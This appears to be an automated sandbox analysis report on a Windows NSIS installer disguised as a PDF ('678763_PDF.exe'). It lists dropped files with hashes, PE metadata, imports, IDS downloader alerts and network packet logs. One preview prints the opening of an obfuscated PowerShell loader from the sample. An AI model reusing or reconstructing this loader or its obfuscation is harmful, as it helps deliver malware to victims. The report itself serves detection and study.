Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23q5pkyc.sp4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4wq5heh.npl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b35hvi5f.gab.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tanz21lg.rfq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\678763_PDF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	5.2959870663251625
Encrypted:	false
SSDEEP:	96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
MD5:	B4579BC396ACE8CAFD9E825FF63FE244
SHA1:	32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
SHA-256:	01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
SHA-512:	3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: Shipping documents 000022999878999800009999.exe, Detection: malicious, Browse Filename: Ze1Ueabtx5.img, Detection: malicious, Browse Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious, Browse Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse Filename: Ms63nDrOBa.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus

Download File

Process:	C:\Users\user\Desktop\678763_PDF.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4127), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	70030
Entropy (8bit):	5.186054392297633
Encrypted:	false
SSDEEP:	1536:VHodzxpVgidFiCnSE/aLMzGhqwkbNaHcqWGrkdw9NQyVcZ:1odzffdACnSwyQWfodwEyaZ
MD5:	768076BC07A8269777ECA668FFAD03DB
SHA1:	F45FE94624260D24D11FD08CEF836613C7B6B6DE
SHA-256:	5DD1C6B30BE06F7D0B330DB92B5CE440F11ABD4D0E0574325054AA32E6704373
SHA-512:	E3118FCF36589362057D930E89B8E65D8F5E5F83CD3F1C105EA23A86633CAD45D063D4E59A7E2E88B301FBAD79B2B250C18B4188DB1B2469E7989719F6BA0DA9
Malicious:	true
Preview:	$Caulocarpic=$Redaktionscheferne;.....<#Tyrannisers Recrementitious Unitised Skibssidernes Nyvurderingers Wetnesses #>..<#Nykritikkernes Ransager Blgetoppe #>..<#Milioline Yvonna Trodse Voves #>..<#Middelstandenes Supernaturalise Rancourous #>..<#Judicatory Brochen Boomet Megacity Magikerne #>..<#Kulinariskes Humorlesses Lukkelser overdkning Glenny #>...$protogaster = @'.Electro. achas$BiosfreVUnscoldiKong blnInddatadMottoetm Lnu jvaSkuringg ucketfeBenzintr NonhaziSki per=Cellpho$ErhvervSF kkesiw Mythope HempieeKnaphedpCalab ruFintmaspTong.eb;S rpuli. ,edlemfSy domsuGennemtnTrop.vec archmtHovedsaiFimre eoDoublewnArago,s KursdifSPr.conqeA terudnScle.otsGermansoGunarchmStar.lioBerge ebexcalfaiscrollwl Oms ndiAivrabatAnvendeyEurythe Kvotas(Ap lika$MidshipDDetailgoTjenestsI,foliaeUnwi.ldrNonaboriAnisejonsvmmedygGenleveeInstrukn UtydelsPhiloso, Delila$AndesinUReaumurfDiminutsp dsyas)Under.i fo eclo{ Borreb. Be.ive. trykvr$SeraphiiParasysd Deis iiClaybouoKontohat Defkath FlygtneRegreasr

C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Stttepenge.Con

Download File

Process:	C:\Users\user\Desktop\678763_PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	310013
Entropy (8bit):	7.687302488366902
Encrypted:	false
SSDEEP:	6144:HDzFj/9nG6bEzOBZXWAOngd9+FyqlnHuNepIjgppyDkvLN:jzzGg73Jd+yqlHUeW8DyDw
MD5:	68203BE6AECA0041E89C1B3AD79D66AB
SHA1:	9FDFCE5EF08C4CEA42305DC42AAFAC600EDFBDCF
SHA-256:	F96640C810B03B5701A67EF0B8916B5D4D3D47CB6BEFED3337462E2F6FF2711C
SHA-512:	FD594BEC40CBF4DB10A593B94172856429F9DB80A021A54A6674FCD6861D34CF28CA0CFB593D5C0671E82BAEAE96A60BFD66F35137D4FFF7016880951665ACD0
Malicious:	false
Preview:	....................................n.....]..i...Y...^..\|\|.(............W....]].\|\|\|..................``.%%........2.S...............7.nn.............HH...................}}}}........e...............^.......NN.................222........0............n.......e...}}.......!.........."""....r.55.......................0...yy.......................!!!.t....___.....................................3.b.........??................................5.........vv..nnn........(................pp.....P.EE.rr.**.=..............................qqqqq...... ............aaa..N.......................................v...............gggg...[..............a......g...................UUU..~~~~~...ddd.&.......{{.......r.ee.....www...............EE....................K...............................$$....................PP...KKK...........%%%......YYYY..........".....xxx...................-.......RR........................YYYY..........XX....................................777.D.....:..##..................hh...3

C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\preappearance.glu

Download File

Process:	C:\Users\user\Desktop\678763_PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	408232
Entropy (8bit):	1.259531155482668
Encrypted:	false
SSDEEP:	768:c3mYm00dVSgDT+afxNr3DwNJbiI7MrrtHFmYA3vCiuv/BQanrlhqkroqqL7jCzHs:X00FVwDotSeUpjvxXDpih4YZtc
MD5:	CCE82C77E237537520FBD52B63A51E58
SHA1:	D902CE813446431FFECA35141FCD9825D4DBEF4D
SHA-256:	0F7DCA6879E497104B6813228391DECF7D6270D90FC887F1B9384B5E5B438221
SHA-512:	2F0C0A6FBA09D19D72828589A658FEECD9E0A03F2B8C3DCA046AACFCB887375D538452D59DB24EDB8D17199AC3CA43ED1373262B6206B30F55F00ED159BAFEFE
Malicious:	false
Preview:	.......................................................................................P................0......................................................(.....................................................................................S.............................r..-.................n...................]....................................\|e................`......................{.................................J....................*......J............................]..................................................u..............................................................................................................\........................:...............................................................M..........................................................................................................................l..............l....8...........9............................................................2....=.........................................

C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\reaktiv.ove

Download File

Process:	C:\Users\user\Desktop\678763_PDF.exe
File Type:	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 55
Category:	dropped
Size (bytes):	379198
Entropy (8bit):	1.2531245811733491
Encrypted:	false
SSDEEP:	1536:K2a+g7Qqek5bnEKRY3dJkKoYZrcvYy5oXBfwokPtW:TrvqLJnudnttcvARYtW
MD5:	B4BD98AA231F431FA2C0B32C041971DA
SHA1:	D58868B02A5DEDACC33CE7EB0658201EF5A29766
SHA-256:	E34CA004CCB16A80E49010B584428A08AB3D89FCA778567346D26F84FF892962
SHA-512:	69CD7AF495A1DC3F612B456A2ABB2FE9F6FF556E73DA0707B26325E08AA94138FB094DAA4A35E7C7BCDCE81FDF118A9A4C664632523CEED16765B2E74FCBDD05
Malicious:	false
Preview:	........7....................................................$................................................n.........b...............S...............................................~%..........................................................................K................................................._....w.......*e.......b.'.....M.......].....................................................[.......................................................................u...G.............G.....................................F!.......................w...................................................................................r.....................................................F................>.s.....................................2......E..............g............................................................C.>...............A.........................................................................................................................S..........................

C:\Users\user\AppData\Roaming\erstatningsgraden\storfavoritters.tid

Download File

Process:	C:\Users\user\Desktop\678763_PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	495136
Entropy (8bit):	1.2514913232658866
Encrypted:	false
SSDEEP:	1536:jfLDH9Jx2uiEaWIwEfM+5EUPDohS/uF1bXyCOAqRu:TsIaV+CDTuF1bizAT
MD5:	F28B6FB0CA8AF14D2913C43CBEA08754
SHA1:	0BA129FCFA0131A4EFCDF2B1952F4FAE59604720
SHA-256:	F1C35573809F92DC65D2EB2EBC3CD9D0C78E75E73ED741E52BAECAE2FC02DD70
SHA-512:	523F6E0A8E879F13AB9D7BAE0E7A7E0157ABB0A8B1240F0EC0B5FF84C26A3F1519535DFAD9170BC6E887AE70DE03B939148D629695DB71DC53DF5A75AC2E2757
Malicious:	false
Preview:	...n.............................Y.....................!.......j.........[...............R................+.........M............................................................=..........................................................j....g.......9..........................&....................................s.......................x.......{............-............................................V......................u......................................................................................F.........y..................V.............\.......................`....................]..........e.......1.........6.......M................+...................................S...e..............................................g..........................Z.....26............C...&...............................................-...................................................................)..................................................................................G......

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.810658317463929
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	678763_PDF.exe
File size:	711'659 bytes
MD5:	42b3eeff606c41053b2b30e6df1baa87
SHA1:	8957ac95d71567ccf7d0efc28ddcc944352308d0
SHA256:	f3b82a629b1eff8b49edcfb38f2d0cbd0ef366a59a97264eb7b86373a45588c4
SHA512:	2646e4cd32e39c285be65eecab4bc6c6e92a1b5e5992ba53b5d4f062ddcde1b1a596773d2976442be6ed3be5d36144f4cf23caf665b248909aa1aee316b453b8
SSDEEP:	12288:IfL/UfibuJ2zMMzztVZK+u5YBCtKlQyYefZKSxA340ryKhzJ:IfL8fibuJ2/JVZZuaBCtjexKj3vR
TLSH:	68E412C07C5144A3EEA67973F9BA1C6017A32D6763D9331F13B4726829A3213971FA1B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........

File Icon


Icon Hash:	539b8caeaee66c11

Static PE Info

General

Entrypoint:	0x403532
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007FF01109ECAAh
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007FF01109EC78h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [004347B8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8608	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x54000	0x16bf0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x68d8	0x6a00	742185983fa6320c910f81782213e56f	False	0.6695165094339622	data	6.478461709868021	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1464	0x1600	a995b118b38426885fc6ccaa984c8b7a	False	0.4314630681818182	data	4.969091535632612	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2a818	0x600	9a9bf385a30f1656fc362172b16d9268	False	0.5247395833333334	data	4.172601271908501	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x1f000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x54000	0x16bf0	0x16c00	4361f60a54e8593e396ed02385fb8e51	False	0.43695269574175827	data	5.337867037994319	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x54328	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.3725452502070271
RT_ICON	0x64b50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5725103734439834
RT_ICON	0x670f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.676829268292683
RT_ICON	0x681a0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.6172707889125799
RT_ICON	0x69048	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.7436823104693141
RT_ICON	0x698f0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.5361271676300579
RT_ICON	0x69e58	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.849290780141844
RT_DIALOG	0x6a2c0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x6a3c0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x6a4e0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x6a5a8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x6a608	0x68	data	English	United States	0.7211538461538461
RT_VERSION	0x6a670	0x240	data	English	United States	0.5364583333333334
RT_MANIFEST	0x6a8b0	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-02T16:14:55.175759+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.217.19.174	443	TCP
2024-12-02T16:15:09.022615+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49745	132.226.8.169	80	TCP
2024-12-02T16:15:11.710105+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49745	132.226.8.169	80	TCP
2024-12-02T16:15:13.419750+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49772	172.67.177.134	443	TCP
2024-12-02T16:15:15.100741+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49778	132.226.8.169	80	TCP
2024-12-02T16:15:16.737515+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49779	172.67.177.134	443	TCP
2024-12-02T16:15:23.789550+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49797	172.67.177.134	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 16:14:52.390362978 CET	49736	443	192.168.2.4	172.217.19.174
Dec 2, 2024 16:14:52.390398979 CET	443	49736	172.217.19.174	192.168.2.4
Dec 2, 2024 16:14:52.390485048 CET	49736	443	192.168.2.4	172.217.19.174
Dec 2, 2024 16:14:52.448854923 CET	49736	443	192.168.2.4	172.217.19.174
Dec 2, 2024 16:14:52.448880911 CET	443	49736	172.217.19.174	192.168.2.4
Dec 2, 2024 16:14:54.245785952 CET	443	49736	172.217.19.174	192.168.2.4
Dec 2, 2024 16:14:54.245999098 CET	49736	443	192.168.2.4	172.217.19.174
Dec 2, 2024 16:14:54.246519089 CET	443	49736	172.217.19.174	192.168.2.4
Dec 2, 2024 16:14:54.246643066 CET	49736	443	192.168.2.4	172.217.19.174
Dec 2, 2024 16:14:54.367722988 CET	49736	443	192.168.2.4	172.217.19.174
Dec 2, 2024 16:14:54.367742062 CET	443	49736	172.217.19.174	192.168.2.4
Dec 2, 2024 16:14:54.368092060 CET	443	49736	172.217.19.174	192.168.2.4
Dec 2, 2024 16:14:54.368177891 CET	49736	443	192.168.2.4	172.217.19.174
Dec 2, 2024 16:14:54.393762112 CET	49736	443	192.168.2.4	172.217.19.174
Dec 2, 2024 16:14:54.439327002 CET	443	49736	172.217.19.174	192.168.2.4
Dec 2, 2024 16:14:55.175755024 CET	443	49736	172.217.19.174	192.168.2.4
Dec 2, 2024 16:14:55.175848961 CET	49736	443	192.168.2.4	172.217.19.174
Dec 2, 2024 16:14:55.176044941 CET	49736	443	192.168.2.4	172.217.19.174
Dec 2, 2024 16:14:55.176088095 CET	443	49736	172.217.19.174	192.168.2.4
Dec 2, 2024 16:14:55.176141024 CET	49736	443	192.168.2.4	172.217.19.174
Dec 2, 2024 16:14:55.333709002 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:14:55.333744049 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:14:55.333810091 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:14:55.334381104 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:14:55.334397078 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:14:57.074708939 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:14:57.074815035 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:14:57.080291033 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:14:57.080306053 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:14:57.080550909 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:14:57.080593109 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:14:57.081068039 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:14:57.123333931 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.054001093 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.054090977 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.067625999 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.067691088 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.174009085 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.174108982 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.177918911 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.178661108 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.178877115 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.179039955 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.255140066 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.255218983 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.259032965 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.259087086 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.259126902 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.259164095 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.266942024 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.266998053 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.269999981 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.270049095 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.274059057 CET	443	49737	142.250.181.129	192.168.2.4
